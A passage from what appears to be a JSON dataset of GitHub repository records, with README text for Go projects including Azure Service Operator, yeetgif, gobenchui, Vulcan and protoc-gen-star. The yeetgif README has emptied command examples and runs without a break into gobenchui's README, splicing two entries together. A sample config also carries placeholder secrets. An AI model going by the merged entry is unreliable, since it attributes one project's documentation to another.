settings:\nSERVER_HOST=\"0.0.0.0\"\nSERVER_PORT=5000\nSERVER_READ_TIMEOUT=60\n\n# JWT settings:\nJWT_SECRET_KEY=\"secret\"\nJWT_SECRET_KEY_EXPIRE_MINUTES_COUNT=15\nJWT_REFRESH_KEY=\"refresh\"\nJWT_REFRESH_KEY_EXPIRE_HOURS_COUNT=720\n\n# Database settings:\nDB_TYPE=\"pgx\" # pgx or mysql\nDB_HOST=\"cgapp-postgres\"\nDB_PORT=5432\nDB_USER=\"postgres\"\nDB_PASSWORD=\"password\"\nDB_NAME=\"postgres\"\nDB_SSL_MODE=\"disable\"\nDB_MAX_CONNECTIONS=100\nDB_MAX_IDLE_CONNECTIONS=10\nDB_MAX_LIFETIME_CONNECTIONS=2\n\n# Redis settings:\nREDIS_HOST=\"cgapp-redis\"\nREDIS_PORT=6379\nREDIS_PASSWORD=\"\"\nREDIS_DB_NUMBER=0\n```\n\n## \u26a0\ufe0f License\n\nApache 2.0 © [Vic Sh\u00f3stak](https://shostak.dev/) & [True web artisans](https://1wa.co/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Azure/azure-service-operator", "link": "https://github.com/Azure/azure-service-operator", "tags": ["kubernetes", "azure", "kubernetes-operators", "service", "operators"], "stars": 531, "description": "Azure Service Operator allows you to create Azure resources using kubectl", "lang": "Go", "repo_lang": "", "readme": "# Azure Service Operator (for Kubernetes)\n[![Go Report Card](https://goreportcard.com/badge/github.com/Azure/azure-service-operator)](https://goreportcard.com/report/github.com/Azure/azure-service-operator)\n[![Build Status](https://dev.azure.com/azure/azure-service-operator/_apis/build/status/Azure.azure-service-operator?branchName=main)](https://dev.azure.com/azure/azure-service-operator/_build/latest?definitionId=36&branchName=main)\n![v2 Status](https://github.com/azure/azure-service-operator/actions/workflows/live-validation.yml/badge.svg?branch=main)\n\n> Note: The API is expected to change (while adhering to semantic versioning). Alpha, Beta, and Stable mean roughly the same for this project as they do for [all Kubernetes features](https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates/#feature-stages).\n\n## What is it?\n**Azure Service Operator** (ASO) helps you provision Azure resources and connect your applications to them from within Kubernetes.\n\nIf you want to use Azure resources but would prefer to manage those resources using Kubernetes tooling and primitives (for example `kubectl apply`), then Azure Service Operator might be for you.\n\n## Overview\n\nThe Azure Service Operator consists of:\n\n- The Custom Resource Definitions (CRDs) for each of the Azure services a Kubernetes user can provision.\n- The Kubernetes controller that manages the Azure resources represented by the user specified Custom Resources. The controller attempts to synchronize the desired state in the user specified Custom Resource with the actual state of that resource in Azure, creating it if it doesn't exist, updating it if it has been changed, or deleting it.\n\n## Versions of Azure Service Operator\nThere are two major versions of Azure Service Operator: v1 and v2. Consult the below table and descriptions to learn more about which you should use.\n\n> Note: ASO v1 and v2 are two totally independent operators. Each has its own unique set of CRDs and controllers. They can be deployed side by side in the same cluster.\n\n| ASO Version | Lifecycle stage | Development status | Installation options |\n| ----------- |-----------------| --------------------------------- |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| v2 | Beta | Under active development. | [Helm chart](/v2/charts), [GitHub release 2.x](https://github.com/Azure/azure-service-operator/releases). See [installation](https://azure.github.io/azure-service-operator/#installation) for example. |\n| v1 | Beta | Bug and security fixes primarily. | [Helm chart](/charts), [OperatorHub](https://operatorhub.io/operator/azure-service-operator) or [GitHub release 1.x](https://github.com/Azure/azure-service-operator/releases) |\n\n### ASO v2\nAzure Service Operator v2 was built based on the lessons learned from ASO v1, with the following improvements:\n\n* Supports code-generated CRDs based on [Azure OpenAPI specifications](https://github.com/Azure/azure-rest-api-specs). This enables us to quickly add new resources as they are requested.\n* More powerful `Status`. You can view the actual state of the resource in Azure through ASO v2, which enables you to see server-side applied defaults and more easily debug issues.\n* Dedicated storage versions. This enables faster (and less error prone) support for new Azure API versions, even if there were significant changes in resource shape.\n* Uniformity. ASO v2 resources are very uniform due to their code-generated nature.\n* Clearer resource states. The state a resource is in is exposed via a [Ready condition](https://azure.github.io/azure-service-operator/design/resource-states/).\n\n[Learn more about Azure Service Operator v2](https://azure.github.io/azure-service-operator/)\n\n### ASO v1\n> **\u26a0\ufe0f We strongly recommend new users consider [ASO v2]((https://azure.github.io/azure-service-operator/)) instead of ASO v1**\n\nAzure Service Operator v1 is no longer under active development. Bug and security fixes are still made.\n\nFeatures may be added if the scope is small and the impact is large, but we are winding down investment into ASO v1. If you are already using ASO v1 a migration path/tool will be provided to eventually move ASO v1 resources to ASO v2. In the meantime you can continue using ASO v1 as you have been.\n\n[Learn more about Azure Service Operator v1](/docs/v1/README.md)\n\n## Contributing\n\nThe [contribution guide](CONTRIBUTING.md) covers everything you need to know about how you can contribute to Azure Service Operators.\n\n## Support and feedback\n\nFor help, please use the following resources:\n\n1. Review the [documentation](https://azure.github.io/azure-service-operator/)\n2. Search [open issues](https://github.com/Azure/azure-service-operator/issues). If your issue is not represented there already, please [open a new one](https://github.com/Azure/azure-service-operator/issues/new/choose).\n3. Chat with us on the `azure-service-operator` channel of the [Kubernetes Slack](https://kubernetes.slack.com/). If you are not a member you can get an invitation from the [community inviter](https://communityinviter.com/apps/kubernetes/community).\n\nFor more information, see [SUPPORT.md](SUPPORT.md).\n\n## Code of conduct\n\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information, see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sgreben/yeetgif", "link": "https://github.com/sgreben/yeetgif", "tags": ["gif", "effects", "cli", "roll", "wobble", "zoom", "shake", "woke", "fried", "hue", "tint", "optimize", "emoji", "eggplant", "yeet", "golang", "slack", "discord", "maymays", "graphics"], "stars": 531, "description": "gif effects CLI. single binary, no dependencies. linux, osx, windows. #1 workplace productivity booster. #yeetgif #eggplant #golang", "lang": "Go", "repo_lang": "", "readme": "# yeetgif\n\nComposable GIF effects CLI, with reasonable defaults. Made for custom Slack/Discord emoji :)\n\n![terminal](doc/terminal.gif)\n\n- [Get it](#get-it)\n - [Alternative 1: `go get`](#alternative-1-go-get)\n - [Alternative 2: just download the binary](#alternative-2-just-download-the-binary)\n - [Alternative 3: docker](#alternative-3-docker)\n- [Use it](#use-it)\n- [Hall of Fame](#hall-of-fame)\n- [Usage](#usage)\n - [Conventions & tips](#conventions--tips)\n - [roll](#roll)\n - [wobble](#wobble)\n - [pulse](#pulse)\n - [zoom](#zoom)\n - [shake](#shake)\n - [woke](#woke)\n - [fried](#fried)\n - [hue](#hue)\n - [tint](#tint)\n - [resize](#resize)\n - [crop](#crop)\n - [optimize](#optimize)\n - [compose](#compose)\n - [crowd](#crowd)\n - [erase](#erase)\n - [chop](#chop)\n - [text](#text)\n - [emoji](#emoji)\n - [rain](#rain)\n - [cat](#cat)\n - [meta](#meta)\n- [Licensing](#licensing)\n\n## Get it\n\n### Alternative 1: `go get`\n\n```sh\ngo get -u github.com/sgreben/yeetgif/cmd/gif\n```\n\n### Alternative 2: just download the binary\n\nEither from [the releases page](https://github.com/sgreben/yeetgif/releases/latest), or from the shell:\n\n```sh\n# Linux\ncurl -L https://github.com/sgreben/yeetgif/releases/download/${VERSION}/gif_${VERSION}_linux_x86_64.tar.gz | tar xz\n\n# OS X\ncurl -L https://github.com/sgreben/yeetgif/releases/download/${VERSION}/gif_${VERSION}_osx_x86_64.tar.gz | tar xz\n\n# Windows\ncurl -LO https://github.com/sgreben/yeetgif/releases/download/${VERSION}/gif_${VERSION}_windows_x86_64.zip\nunzip gif_${VERSION}_windows_x86_64.zip\n```\n\n**NOTE**: To use the `optimize` command, you'll also need the [`giflossy`](https://github.com/kornelski/giflossy) fork of `gifsicle` installed:\n\n```sh\nbrew install giflossy\n```\n\nYou'll likely also want to have the binary in your `$PATH`. You can achieve this by adding this to your .bashrc (or .zshrc, ...):\n\n```sh\nexport PATH=:$PATH\n```\n\n### Alternative 3: docker\n\n```sh\ndocker pull quay.io/sergey_grebenshchikov/yeetgif\ndocker tag quay.io/sergey_grebenshchikov/yeetgif gif # (optional)\n```\n\n## Use it\n\n```sh\ndoc/yeet.gif\n```\n![before](doc/yeet.png)\n![after](doc/yeet.gif)\n\n\n```sh\ngif emoji aubergine | gif wobble >doc/eggplant_wobble.gif\n```\n![before](doc/eggplant.png)\n![after](doc/eggplant_wobble.gif)\n\n## Hall of Fame\n\nPost a GIF made using yeetgif with either the\n\n- [`#yeetgif` Twitter hashtag](https://twitter.com/hashtag/yeetgif?f=tweets)\n- and/or the [`#yeetgif` Giphy hashtag](https://giphy.com/search/yeetgif-stickers)\n- and/or the [`#yeetgif` Imgur hashtag](https://imgur.com/t/yeetgif)\n\n~~Best~~ Most utterly demented ones end up below!\n\n> No entries yet. Be the first :)\n\n## Usage\n\n```text\n${USAGE}\n```\n\n### Conventions & tips\n\n- To find out how a given example was made, try running `gif meta show` on it (e.g. ``.\n\n### roll\n\n![before](doc/eggplant.png)![after](doc/roll.gif)\n\n```text\n${USAGE_roll}\n```\n\n### wobble\n\n![before](doc/eggplant.png)![after](doc/wobble.gif)\n\n```text\n${USAGE_wobble}\n```\n\n### pulse\n\n![before](doc/eggplant.png)![after](doc/pulse.gif)\n\n```text\n${USAGE_pulse}\n```\n\n### zoom\n\n![before](doc/eggplant.png)![after](doc/zoom.gif)\n\n```text\n${USAGE_zoom}\n```\n\n### shake\n\n![before](doc/eggplant.png)![after](doc/shake.gif)\n\n```text\n${USAGE_shake}\n```\n\n### woke\n\n![before](doc/yeet.png)![after](doc/woke.gif)\n\n```text\n${USAGE_woke}\n```\n\n### fried\n\n![before](doc/yeet.png)![after](doc/fried.gif)\n\n```text\n${USAGE_fried}\n```\n\n### hue\n\n![before](doc/eggplant.png)![after](doc/hue.gif)\n\n```text\n${USAGE_hue}\n```\n\n### tint\n\n![before](doc/eggplant.png)![after](doc/tint.gif)\n\n```text\n${USAGE_tint}\n```\n\n### resize\n\n```text\n${USAGE_resize}\n```\n\n### crop\n\n```text\n${USAGE_crop}\n```\n\n### optimize\n\n```text\n${USAGE_optimize}\n```\n\n### compose\n\n![before](doc/yeet.png)![before](doc/eggplant.png)![after](doc/compose.gif)\n\n```text\n${USAGE_compose}\n```\n\n### crowd\n\n![before](doc/wobble.gif)![after](doc/crowd.gif)\n\n```text\n${USAGE_crowd}\n```\n\n### erase\n\n![before](doc/skeledance.gif)![after](doc/erase.gif)\n\n```text\n${USAGE_erase}\n```\n\n### chop\n\n```text\n${USAGE_chop}\n```\n\n### text\n\n![before](doc/gunther.jpg)![after](doc/gunther.gif)\n> woke | text | fried\n\n```text\n${USAGE_text}\n```\n\n### emoji\n\n![example](doc/emoji-terminal.gif)\n> emoji | compose <(emoji) | compose <(emoji) | wobble | fried\n\n```text\n${USAGE_emoji}\n```\n\n### rain\n\n![example](doc/rain.gif)\n\n> emoji | rain\n\n![example](doc/rain-thonk.gif)\n\n> emoji | roll | rain <(emoji) <(emoji)\n\n![example](doc/rain-scream.gif)\n\n> emoji | pulse | rain <(emoji) | compose | fried\n\n```text\n${USAGE_rain}\n```\n\n### cat\n\n```text\n${USAGE_cat}\n```\n\n### meta\n\n\n![input](doc/yeet.gif)\n```sh\n$ \n\n## Features\n\n* nice web based UI with animation, tooltips, icons and realtime status update\n* separate time and memory charts\n* export chart to PNG, JPEG, PDF or SVG formats\n* supports Git and Mercurial version control\n* supports projects that use [gb](http://getgb.io) or GO15VENDOREXPERIMENT vendoring\n* advanced commits filtering\n* supports regexps for benchmarks\n* handles build errors and panics\n\n## Installation\n\nJust go get it:\n\n go get -u github.com/divan/gobenchui\n\n## Usage\n\nTo run benchmarks, simply specify package name:\n\n gobenchui -last 10 github.com/jackpal/bencode-go\n\nor, if you're inside this directory, use `.`:\n\n cd $GOPATH/github.com/jackpal/bencode-go\n gobenchui -last 10 .\n\nBrowser will pops up. If not, follow instructions printed to console.\n\n## Filtering commits\n\n#### Basic filtering\n\nBy default, gobenchui will run benchmarks over all commits in repository. You may want to limit commits amount to last N commits only. Use `-last` option:\n\n gobenchui -last 20 .\n\nIf the number of commits is huge, but you want to get overview for complete project history, you may use `-max` option. It tries to divide all commits to N equal blocks, spread it as equally as possible and guarantee that you'll get overview for exactly N commits:\n\n gobenchui -max 15 .\n \nYou also may use `-last` and `-max` in conjunction, to, say, get maximum 10 commits overview from last 100:\n\n gobenchui -max 10 -last 100 .\n\n#### VCS specific filtering\n\nIf you need more powerful commits filtering, you can pass arbitrary arguments to you VCS command with `-vcsArgs`. Say, for `git`, you may specify:\n\n gobenchui -vcsArgs \"--since=12.hours\" .\n\nto get commits from the last 12 hours. Or:\n\n gobenchui -vcsArgs \"--author Ivan --since 2.weeks --grep bench\" .\n \nto get all commits by author 'Ivan' for the last 2 weeks that has word \"bench\" in commit message. Or:\n\n gobenchui -vcsArgs \"--no-walk --tag\" .\n \nto get only commits where tag was added.\n\nIn other words, it's really powerful way to select only needed commits. See this [git book chapter](https://git-scm.com/book/en/v2/Git-Basics-Viewing-the-Commit-History) for more details.\n\nNote, that gobenchui will filter out args that may modify output (like `--pretty` or `--graph`), because fixed formatting is used for parsing output.\n\n## Benchmark options\n\nIn the same manner you may pass additional options to benchmarking tool. Typically you only need to specify regexp for benchmark functions:\n\n gobenchui -bench Strconv$ .\n \nIt uses the same regexp rules as `go test` tool. You may also add additional flags like `-short`.\n\n## Vendoring support\n\n`gobenchui` supports gb and GO15VENDOREXPERIMENT out of the box. It can be extended to support more vendoring solutions, as it has proper interface for that.\n\nIt tries to detect right tool on each commit, so if you introduced vendoring recently, older benchmarks would work also (just make sure, needed packages still in your GOPATH before running benchmarks).\n\nI didn't test heavily that part, so there may be some bugs or corner cases I'm not aware of.\n\n## Known issues\n\n * in case where latest commits has broken test, they will not appear in chart\n * may be issues with internal/ subpackages\n * chart icons for errors aren't exported correctly\n\n## Contribute\n \nMy frontend JS code sucks, just because, so if you want to design and implement new better web UI - you're more than welcome.\n\nMake sure to run `go generate` to regenerate assets. Or use GOBENCHUI_DEV env variable to read assets from filesystem.\n\n## Afterwords\n\nHopefully, this tool will bring more incentive to write benchmarks.\n\n## License\n\nThis program is under [WTFPL license](http://www.wtfpl.net)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "digitalocean/vulcan", "link": "https://github.com/digitalocean/vulcan", "tags": ["prometheus", "metrics", "tsdb"], "stars": 531, "description": "Vulcan extends Prometheus adding horizontal scalability and long-term storage", "lang": "Go", "repo_lang": "", "readme": "# Warning: This project is currently not maintained, and there is no plan to do so ATM.\n\n# Vulcan [![Build Status](https://travis-ci.org/digitalocean/vulcan.svg?branch=master)](https://travis-ci.org/digitalocean/vulcan) [![Report Card](https://goreportcard.com/badge/github.com/digitalocean/vulcan)](https://goreportcard.com/report/github.com/digitalocean/vulcan)\n\nVulcan extends Prometheus adding horizontal scalability and long-term storage.\n\n_Vulcan is highly experimental._\n\n## Why\n\nPrometheus has an upper-limit on the number of samples it can handle and manually sharding Prometheus is difficult. Prometheus provides\nno built-in way to rebalance data between nodes once sharded, which makes accommodating additional load via adding nodes a difficult, manual process. Queries\nagainst manually-sharded Prometheus servers must be rethought since each Prometheus instance only has a subset of the total metrics.\n\nIt is difficult to retain data in Prometheus for long-term storage as there is no built-in way to backup and restore Prometheus data. Mirroring\nPrometheus (running multiple identically-configured Prometheus servers) is an option for high availability (and good for the role of monitoring),\nbut newly created mirrors lack historical data and therefore don't provide historical data or any additional replication factor.\n\nVulcan is horizontally scalable and built for long-term storage. In order to accommodate growing load, add more resources to Vulcan. There is no need to think about how to shard\n data and how sharding will affect queries.\n\nPrometheus (as of v1.2.1) is able to forward metrics to Vulcan. Existing Prometheus deployments can easily reconfigure their Prometheus servers to forward all (or just some) metrics\nto Vulcan. Prometheus can continue operating as a simple and reliable monitoring system while utilizing Vulcan for long-term storage.\n\n### Why the name Vulcan?\n\n_Vulcan is the roman god of fire, metalworking and of the forge. Raised in the [digital] ocean, Vulcan was charged with crafting the tools and weaponry._\n\nVulcan aims to enhance the Prometheus ecosystem. Thank you Prometheus for stealing us fire in the first place.\n\n## Architecture\n\nRefer to [architecture.md](architecture.md)\n\n## Contributing\n\nRefer to [CONTRIBUTING.md](CONTRIBUTING.md)\n\n## Contact\n\nThe core developers are accessible via the [Vulcan Developers Mailinglist](https://groups.google.com/forum/#!forum/vulcan-developers)\n\n## Ethos\n\nVulcan components should be stateless; state should be handled by open-source databases (e.g. Cassandra, Kafka).\n\nVulcan should be API-compatible with Prometheus. e.g. PromQL discussions and improvements should happen in the\nPrometheus community, committed to Prometheus, and then utilized in Vulcan.\n\n## License\n\nApache License 2.0, see [LICENSE](LICENSE).\n", "readme_type": "markdown", "hn_comments": "I'm guessing the Prometheus they mean is a time-series database. See: https://prometheus.io/Kinda don't get why DigitalOcean \"forked\" rather than solving the long-term retention problem by working with upstream, especially given the number of comments which state \"Development in this area should be done in Prometheus first then merged into Vulcan\".Feels like another \"We want our shed to be blue\".One thing I don't really like about Prometheus is it seems to prefer the pull aka scraping model over the push model.I think the push model is better in terms of security and discovery (which is how I think most of the other metric aggregators work).I don't even like log scrapping. I just push the log data through kafka or rabbitmq and have something else pick it up.I do like how Prometheus has a dimensional model instead of just raw timeseries.Speaking of which I still haven't found an effective way of merging or correlating metric data with log data (particularly since it is two different systems).I sort of made some experimental headway with Druid since it kind of has generic event and metric support. This was only possibly because the events are being pushed and not pulled (ie pushing to a bus allows for syndication).", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lyft/protoc-gen-star", "link": "https://github.com/lyft/protoc-gen-star", "tags": ["lyft"], "stars": 531, "description": "protoc plugin library for efficient proto-based code generation", "lang": "Go", "repo_lang": "", "readme": "# protoc-gen-star (PG*) [![Build Status](https://travis-ci.org/lyft/protoc-gen-star.svg?branch=master)](https://travis-ci.org/lyft/protoc-gen-star) [![GoDoc](https://godoc.org/github.com/lyft/protoc-gen-star?status.svg)](https://godoc.org/github.com/lyft/protoc-gen-star)\n\n**!!! THIS PROJECT IS A WORK-IN-PROGRESS | THE API SHOULD BE CONSIDERED UNSTABLE !!!**\n\n_PG* is a protoc plugin library for efficient proto-based code generation_\n\n```go\npackage main\n\nimport \"github.com/lyft/protoc-gen-star/v2\"\n\nfunc main() {\n pgs.Init(pgs.DebugEnv(\"DEBUG\")).\n RegisterModule(&myPGSModule{}).\n RegisterPostProcessor(&myPostProcessor{}).\n Render()\n}\n```\n\n## Features\n\n### Documentation\n\nWhile this README seeks to describe many of the nuances of `protoc` plugin development and using PG*, the true documentation source is the code itself. The Go language is self-documenting and provides tools for easily reading through it and viewing examples. The docs can be viewed on [GoDoc](https://godoc.org/github.com/lyft/protoc-gen-star) or locally by running `make docs`, which will start a `godoc` server and open them in the default browser.\n\n### Roadmap\n\n- [x] Interface-based and fully-linked dependency graph with access to raw descriptors\n- [x] Built-in context-aware debugging capabilities\n- [x] Exhaustive, near 100% unit test coverage\n- [x] End-to-end testable via overrideable IO & Interface based API\n- [x] [`Visitor`][visitor] pattern and helpers for efficiently walking the dependency graph\n- [x] [`BuildContext`][context] to facilitate complex generation\n- [x] Parsed, typed command-line [`Parameters`][params] access\n- [x] Extensible `ModuleBase` for quickly creating `Modules` and facilitating code generation\n- [x] Configurable post-processing (eg, gofmt) of generated files\n- [x] Support processing proto files from multiple packages\n- [x] Load comments (via SourceCodeInfo) from proto files into gathered AST for easy access\n- [x] Language-specific helper subpackages for handling common, nuanced generation tasks\n- [ ] Load plugins/modules at runtime using Go shared libraries\n\n### Examples\n\n[`protoc-gen-example`][pge], can be found in the `testdata` directory. It includes two `Module` implementations using a variety of the features available. It's `protoc` execution is included in the `testdata/generated` [Makefile][make] target. Examples are also accessible via the documentation by running `make docs`.\n\n## How It Works\n\n### The `protoc` Flow\n\nBecause the process is somewhat confusing, this section will cover the entire flow of how proto files are converted to generated code, using a hypothetical PG* plugin: `protoc-gen-myplugin`. A typical execution looks like this:\n\n```sh\nprotoc \\\n -I . \\\n --myplugin_out=\"foo=bar:../generated\" \\\n ./pkg/*.proto\n```\n\n`protoc`, the PB compiler, is configured using a set of flags (documented under `protoc -h`) and handed a set of files as arguments. In this case, the `I` flag can be specified multiple times and is the lookup path it uses for imported dependencies in a proto file. By default, the official descriptor protos are already included.\n\n`myplugin_out` tells `protoc` to use the `protoc-gen-myplugin` protoc-plugin. These plugins are automatically resolved from the system's `PATH` environment variable, or can be explicitly specified with another flag. The official protoc-plugins (eg, `protoc-gen-python`) are already registered with `protoc`. The flag's value is specific to the particular plugin, with the exception of the `:../generated` suffix. This suffix indicates the root directory in which `protoc` will place the generated files from that package (relative to the current working directory). This generated output directory is _not_ propagated to `protoc-gen-myplugin`, however, so it needs to be duplicated in the left-hand side of the flag. PG* supports this via an `output_path` parameter.\n\n`protoc` parses the passed in proto files, ensures they are syntactically correct, and loads any imported dependencies. It converts these files and the dependencies into descriptors (which are themselves PB messages) and creates a `CodeGeneratorRequest` (yet another PB). `protoc` serializes this request and then executes each configured protoc-plugin, sending the payload via `stdin`.\n\n`protoc-gen-myplugin` starts up, receiving the request payload, which it unmarshals. There are two phases to a PG*-based protoc-plugin. First, PG* unmarshals the `CodeGeneratorRequest` received from `protoc`, and creates a fully connected abstract syntax tree (AST) of each file and all its contained entities. Any parameters specified for this plugin are also parsed for later consumption.\n\nWhen this step is complete, PG* then executes any registered `Modules`, handing it the constructed AST. `Modules` can be written to generate artifacts (eg, files) or just performing some form of validation over the provided graph without any other side effects. `Modules` provide the great flexibility in terms of operating against the PBs.\n\nOnce all `Modules` are run, PG* writes any custom artifacts to the file system or serializes generator-specific ones into a `CodeGeneratorResponse` and sends the data to its `stdout`. `protoc` receives this payload, unmarshals it, and persists any requested files to disk after all its plugins have returned. This whole flow looks something like this:\n\n```\nfoo.proto \u2192 protoc \u2192 CodeGeneratorRequest \u2192 protoc-gen-myplugin \u2192 CodeGeneratorResponse \u2192 protoc \u2192 foo.pb.go\n```\n\nThe PG* library hides away nearly all of this complexity required to implement a protoc-plugin!\n\n### Modules\n\nPG* `Modules` are handed a complete AST for those files that are targeted for generation as well as all dependencies. A `Module` can then add files to the protoc `CodeGeneratorResponse` or write files directly to disk as `Artifacts`.\n\nPG* provides a `ModuleBase` struct to simplify developing modules. Out of the box, it satisfies the interface for a `Module`, only requiring the creation of `Name` and `Execute` methods. `ModuleBase` is best used as an anonyomous embedded field of a wrapping `Module` implementation. A minimal module would look like the following:\n\n```go\n// ReportModule creates a report of all the target messages generated by the\n// protoc run, writing the file into the /tmp directory.\ntype reportModule struct {\n *pgs.ModuleBase\n}\n\n// New configures the module with an instance of ModuleBase\nfunc New() pgs.Module { return &reportModule{&pgs.ModuleBase{}} }\n\n// Name is the identifier used to identify the module. This value is\n// automatically attached to the BuildContext associated with the ModuleBase.\nfunc (m *reportModule) Name() string { return \"reporter\" }\n\n// Execute is passed the target files as well as its dependencies in the pkgs\n// map. The implementation should return a slice of Artifacts that represent\n// the files to be generated. In this case, \"/tmp/report.txt\" will be created\n// outside of the normal protoc flow.\nfunc (m *reportModule) Execute(targets map[string]pgs.File, pkgs map[string]pgs.Package) []pgs.Artifact {\n buf := &bytes.Buffer{}\n\n for _, f := range targets {\n m.Push(f.Name().String()).Debug(\"reporting\")\n\n fmt.Fprintf(buf, \"--- %v ---\", f.Name())\n\n for i, msg := range f.AllMessages() {\n fmt.Fprintf(buf, \"%03d. %v\\n\", i, msg.Name())\n }\n\n m.Pop()\n }\n\n m.OverwriteCustomFile(\n \"/tmp/report.txt\",\n buf.String(),\n 0644,\n )\n\n return m.Artifacts()\n}\n```\n\n`ModuleBase` exposes a PG* [`BuildContext`][context] instance, already prefixed with the module's name. Calling `Push` and `Pop` allows adding further information to error and debugging messages. Above, each file from the target package is pushed onto the context before logging the \"reporting\" debug message.\n\nThe base also provides helper methods for adding or overwriting both protoc-generated and custom files. The above execute method creates a custom file at `/tmp/report.txt` specifying that it should overwrite an existing file with that name. If it instead called `AddCustomFile` and the file existed, no file would have been generated (though a debug message would be logged out). Similar methods exist for adding generator files, appends, and injections. Likewise, methods such as `AddCustomTemplateFile` allows for `Templates` to be rendered instead.\n\nAfter all modules have been executed, the returned `Artifacts` are either placed into the `CodeGenerationResponse` payload for protoc or written out to the file system. For testing purposes, the file system has been abstracted such that a custom one (such as an in-memory FS) can be provided to the PG* generator with the `FileSystem` `InitOption`.\n\n#### Post Processing\n\n`Artifacts` generated by `Modules` sometimes require some mutations prior to writing to disk or sending in the response to protoc. This could range from running `gofmt` against Go source or adding copyright headers to all generated source files. To simplify this task in PG*, a `PostProcessor` can be utilized. A minimal looking `PostProcessor` implementation might look like this:\n\n```go\n// New returns a PostProcessor that adds a copyright comment to the top\n// of all generated files.\nfunc New(owner string) pgs.PostProcessor { return copyrightPostProcessor{owner} }\n\ntype copyrightPostProcessor struct {\n owner string\n}\n\n// Match returns true only for Custom and Generated files (including templates).\nfunc (cpp copyrightPostProcessor) Match(a pgs.Artifact) bool {\n switch a := a.(type) {\n case pgs.GeneratorFile, pgs.GeneratorTemplateFile,\n pgs.CustomFile, pgs.CustomTemplateFile:\n return true\n default:\n return false\n }\n}\n\n// Process attaches the copyright header to the top of the input bytes\nfunc (cpp copyrightPostProcessor) Process(in []byte) (out []byte, err error) {\n cmt := fmt.Sprintf(\"// Copyright \u00a9 %d %s. All rights reserved\\n\",\n time.Now().Year(),\n cpp.owner)\n\n return append([]byte(cmt), in...), nil\n}\n```\n\nThe `copyrightPostProcessor` struct satisfies the `PostProcessor` interface by implementing the `Match` and `Process` methods. After PG* recieves all `Artifacts`, each is handed in turn to each registered processor's `Match` method. In the above case, we return `true` if the file is a part of the targeted Artifact types. If `true` is returned, `Process` is immediately called with the rendered contents of the file. This method mutates the input, returning the modified value to out or an error if something goes wrong. Above, the notice is prepended to the input.\n\nPostProcessors are registered with PG* similar to `Modules`:\n\n```go\ng := pgs.Init(pgs.IncludeGo())\ng.RegisterModule(some.NewModule())\ng.RegisterPostProcessor(copyright.New(\"PG* Authors\"))\n```\n\n## Protocol Buffer AST\n\nWhile `protoc` ensures that all the dependencies required to generate a proto file are loaded in as descriptors, it's up to the protoc-plugins to recognize the relationships between them. To get around this, PG* uses constructs an abstract syntax tree (AST) of all the `Entities` loaded into the plugin. This AST is provided to every `Module` to facilitate code generation.\n\n### Hierarchy\n\nThe hierarchy generated by the PG* `gatherer` is fully linked, starting at a top-level `Package` down to each individual `Field` of a `Message`. The AST can be represented with the following digraph:\n\n

\n\nA `Package` describes a set of `Files` loaded within the same namespace. As would be expected, a `File` represents a single proto file, which contains any number of `Message`, `Enum` or `Service` entities. An `Enum` describes an integer-based enumeration type, containing each individual `EnumValue`. A `Service` describes a set of RPC `Methods`, which in turn refer to their input and output `Messages`.\n\nA `Message` can contain other nested `Messages` and `Enums` as well as each of its `Fields`. For non-scalar types, a `Field` may also reference its `Message` or `Enum` type. As a mechanism for achieving union types, a `Message` can also contain `OneOf` entities that refer to some of its `Fields`.\n\n### Visitor Pattern\n\nThe structure of the AST can be fairly complex and unpredictable. Likewise, `Module's` are typically concerned with only a subset of the entities in the graph. To separate the `Module's` algorithm from understanding and traversing the structure of the AST, PG* implements the `Visitor` pattern to decouple the two. Implementing this interface is straightforward and can greatly simplify code generation.\n\nTwo base `Visitor` structs are provided by PG* to simplify developing implementations. First, the `NilVisitor` returns an instance that short-circuits execution for all Entity types. This is useful when certain branches of the AST are not interesting to code generation. For instance, if the `Module` is only concerned with `Services`, it can use a `NilVisitor` as an anonymous field and only implement the desired interface methods:\n\n```go\n// ServiceVisitor logs out each Method's name\ntype serviceVisitor struct {\n pgs.Visitor\n pgs.DebuggerCommon\n}\n\nfunc New(d pgs.DebuggerCommon) pgs.Visitor {\n return serviceVistor{\n Visitor: pgs.NilVisitor(),\n DebuggerCommon: d,\n }\n}\n\n// Passthrough Packages, Files, and Services. All other methods can be\n// ignored since Services can only live in Files and Files can only live in a\n// Package.\nfunc (v serviceVisitor) VisitPackage(pgs.Package) (pgs.Visitor, error) { return v, nil }\nfunc (v serviceVisitor) VisitFile(pgs.File) (pgs.Visitor, error) { return v, nil }\nfunc (v serviceVisitor) VisitService(pgs.Service) (pgs.Visitor, error) { return v, nil }\n\n// VisitMethod logs out ServiceName#MethodName for m.\nfunc (v serviceVisitor) VisitMethod(m pgs.Method) (pgs.Vistitor, error) {\n v.Logf(\"%v#%v\", m.Service().Name(), m.Name())\n return nil, nil\n}\n```\n\nIf access to deeply nested `Nodes` is desired, a `PassthroughVisitor` can be used instead. Unlike `NilVisitor` and as the name suggests, this implementation passes through all nodes instead of short-circuiting on the first unimplemented interface method. Setup of this type as an anonymous field is a bit more complex but avoids implementing each method of the interface explicitly:\n\n```go\ntype fieldVisitor struct {\n pgs.Visitor\n pgs.DebuggerCommon\n}\n\nfunc New(d pgs.DebuggerCommon) pgs.Visitor {\n v := &fieldVisitor{DebuggerCommon: d}\n v.Visitor = pgs.PassThroughVisitor(v)\n return v\n}\n\nfunc (v *fieldVisitor) VisitField(f pgs.Field) (pgs.Visitor, error) {\n v.Logf(\"%v.%v\", f.Message().Name(), f.Name())\n return nil, nil\n}\n```\n\nWalking the AST with any `Visitor` is straightforward:\n\n```go\nv := visitor.New(d)\nerr := pgs.Walk(v, pkg)\n```\n\nAll `Entity` types and `Package` can be passed into `Walk`, allowing for starting a `Visitor` lower than the top-level `Package` if desired.\n\n## Build Context\n\n`Modules` registered with the PG* 